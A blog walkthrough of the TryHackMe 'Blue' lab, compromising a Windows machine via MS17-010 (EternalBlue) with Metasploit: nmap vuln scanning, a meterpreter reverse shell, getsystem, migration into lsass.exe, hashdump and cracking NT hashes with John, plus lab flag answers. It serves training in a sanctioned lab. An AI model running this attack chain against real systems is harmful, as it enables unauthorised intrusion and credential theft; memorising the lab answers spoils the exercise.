Skip to main content

TryHackMe - Blue Writeup



RECONNAISSANCE

From a reconnaissance point of view there isn't much to do excepting noting down the IP address of the machine. You can also download this room as a virtual disk file and run it upon an instance of VirtualBox or VMware. Another thing that you must be mindful of is that the machine takes some time to boot so try pinging it before moving on with a nmap scan.


SCANNING AND ENUMERATION

I went ahead with a aggressive scan while also utiltizing the nmap's scripting engine to fire up the scripts in vuln category. The command being nmap -n -Pn -T5 -A --script=vuln <IP_Address> wherein the arugments are

  • -n: To turn off DNS resolution
  • -Pn: To not ping the IP address and directly go ahead with scanning it as I knew if was alive
  • -T5: To increase the timing speed to maximum
  • -A: To perform an aggressive scan which is a combination of custom scripts, OS fingerprinting and service detection of the ports
  • --script=vuln: This is a group of nmap scripts which are used to scan the target for potential vulnerabilities


This essentially provides us with the answer for Task 1:

1. Scan the machine - Done
2. How many ports are open with a port number under 1000? - 3 which are 135 (msrpc), 139 (netbios-ssn) and 445 (microsoft-ds)
3. What is this machine vulnerable to? - ms17-010 which is conveniently provided to us under the heading of vulnerable. If you google about this vulnerability you'll come up with its name which is eternalblue hence the name of this machine.


EXPLOITATION

Since we know what the vulnerability is, the next step is to exploit it with metasploit. Use the search command to look for modules which could help us in leveraging it to gain a shell on the system. 



We can use the first exploit here named exploit/windows/smb/ms17_010_eternalblue. Use it and execute the show options command to take a look at the fields which need to be modified. The only field which needs to be filled is RHOST which takes the IP address of the machine. Before running this module we need to manually define the payload for it and tryhackme suggests a simple command shell  for it which can be accessed with the module named windows/x64/shell/reverse_tcp. However a better option would be to use a more capable shell program such as meterpreter which can be used with the following module windows/x64/meterpreter/reverse_tcp.

So once you've selected your payload of choice its time to run the exploit, sit back and watch the magic. At this point we have also completed our Task 2:

  1. Start Metasploit - done with the command msfconsole
  2. Find the exploitation code we will run against the machine - exploit/windows/smb/ms17_010 which was discovered with the help of search command
  3. Show options and set the one required value - RHOSTS was the only one that needed to be filled
  4. With that done, run the exploit! - done with the run command
  5. Confirm that the exploit has run correctly - done when we get back our shell

POST EXPLOITATION

Now at this point you would either get back a windows shell or a meterpreter shell based upon your chosen payload. If you had chosen meterpreter then you can skip the following steps however if you had chosen the windows shell we'll have to upgrade it to meterpreter to gain some added functionality.

In order to do that we'll have to select a specific post exploitation module which is to be accessed from the msf6 shell. To get back to it you can either execute the "background" command or press Ctrl+Z. Now search for the module with the name post/multi/manage/shell_to_meterpreter and use it. Now if you execute the show options command you'll realize that you need to fill the sessions field. For this you need to know your session number which can be queried with the sessions -i option. Fill the sessions field accordingly and run it. To switch back to your exploit you can use sessions -i <session_number> command. 

PRIVILEGE ESCALATION
To check your privileges you can use the getuid command. The next step is to escalate your privileges to the administrator for which we'll use the command called getsystem.

From here we'll migrate to another process to gain a stronger foothold. This is usually done so that our access remains even if the host closes our process, so we make sure to migrate to an important process such as winlogon.exe or lsass.exe which is less likely to be closed. To do this execute the ps command which will provide you with a list of processes running on the system along with there details.


Note the PID (process ID) of a process which has the user as NT AUTHORITY\SYSTEM which is Windows way of saying that it is an admin process. Now you'll use this process id to move to that process. The command for that would be migrate <process_ID>.

Task 4 has been completed

  1. If you haven't already, background the previously gained shell - done with background or Ctrl + Z
  2. What option are we required to change? - session
  3. Set the required option, you may need to list all of the sessions to find your target here - done with sessions -i
  4. Run - done with run command
  5. Once the meterpreter shell conversion completes, select that session for use - done with sessions -i <session_id>
  6. Verify that we have escalated to NT AUTHORITY\SYSTEM - done with getuid command
  7. List all of the processes running via the 'ps' command. Find a process that is running at NT AUTHORITY\SYSTEM - done
  8. Migrate to this process - done with the command migrate <process_id>

PASSWORD CRACKING
The next step is to obtain the system's password which would allow us to enter into it. For this we can use the hashdump command which would magically provide us with the usernames and hashed passwords. There are several ways to crack this password, an automated way is to submit them to crackstation.net, however if you love terminal like me and don't want to leave it then we have solutions for folks like us too. You can use either hashcat or JohnTheRipper to crack them. Now when you'll run john upon it you'll get a message saying that the hashes are in format NT and LM while it defaults to LM and is unable to crack them. Therefore you'll supply it the format as NT along with a dictionary as rockyou.txt as shown below.


This marks the completion of Task 4
  1. What is the name of the non-default user? - Jon
  2. What is the cracked password? - alqfna22

FINDING FLAGS
In this particular question we know that the format of the flags is flag followed by a number followed by .txt, for e.g. flag1.txt, flag2.txt, etc. We can leverage this and find all of the flags in a single go.

1. Open command prompt and cd to C drive. Then use the following command to search the whole filesystem and look for the flags: dir /S flag*

2. Another approach that can be used is to create a file containing the fingerprint of the whole filesystem. This file can be saved as txt and searched through using notepad's find function. The command for it would be tree /d > C:/Users/Jon/file.txt




3. The slowest method is to search for it using windows search

Task 5 is completed
1. Flag1.txt - flag{access_the_machine} found in the root directory of C:
2. Flag2.txt - flag{sam_database_elevated_access} found in C:/Windows/System32/config
3. Flag3.txt - flag{admin_documents_can_be_valuable} found in C:/Users/Jon/My Documents

Comments

Post a Comment

Popular posts from this blog

C4ptur3-th3-fl4g Walkthrough

TryHackMe c4ptur3-th3-fl4g Walkthrough Task - 1 Translation and Shifting Question 1 -  c4n y0u c4p7u23 7h3 f149? Solution -  This one's quite simple. This is called leet in which the text is written with modified spellings with the help of numbers in place of some characters. The answer for this one is - can you capture the flag? Question 2 -  01101100 01100101 01110100 01110011 00100000 01110100 01110010 01111001 00100000 01110011 01101111 01101101 01100101 00100000 01100010 01101001 01101110 01100001 01110010 01111001 00100000 01101111 01110101 01110100 00100001 Solution -  This is written in binary as you can see that every set of 1's and 0's (separated by space) is a string of 8 numbers. So you can use any online resource such as  rapidtables  to convert binary to ascii. The answer for this is -  lets try some binary out! Question 3 -  MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM====== HINT :  Hav...
Post a Comment
Read more

Hacktober CTF - Writeup

  HACKTOBER CTF   This post contains the writeups for: l  Crypto n  Hail Caesar n  Down The Wrong Path l  Forensics n  Captured Memories n  Amcaching In n  Prefetch Perfection n  Prefetch Perfection 2 l  Linux n  Talking to the dead 1 n  Talking to the dead 2 l  Programming n  Message in an array n  Trick or treat l  Steganography n  You believe in ghosts n  Start digging n  Blasphemy   1 OSINT         n Creeping 1        n  Creeping 2         n Creeping 3         n Past Attacks       Hail Caesar In this question we have to decrypt TGG KUSJWV QGM and the question gives us a hint that its a caesar cipher. Although we don’t know the key but we really don’t need one for this. Loading it up in dcode gives us the answer as BOO SCARED YOU   And thus the flag is flag{ BOO...
2 comments
Read more

Krypton Walkthrough

Krypton Walkthrough Level 1 >> Level 2 Level 2 >> Level 3 Level 3 >> Level 4 Level 4 >> Level 5 Level 5 >> Level 6 Level 6 >> Level 7 Level 1 >> Level 2 Hint Read the question carefully. Solution 1. SSH into the server with username as krypton1 and password as KRYPTONISGREAT $ ssh krypton1@krypton.labs.overthewire.org -p 2231 2. The next step is to find the file upon which we'll be practising. This information is provided in the previous level. So lets hop onto the location. $ cd /krypton/ $ ls $ cd krypton1 3. Reading the README file gives us the answer to try skipping that and directly cat the other file $ cat krypton2 OUTPUT: YRIRY GJB CNFFJBEQ EBGGRA 4. With practice you'll be able to recognize this cipher. Also you can use an online service called boxentriq for recognizing the cipher. It'll also help you in breaking it. As of now the cipher is rot13 which is a caesar cipher with key as 13. The way rot13 works is that it adds 13...
Post a Comment
Read more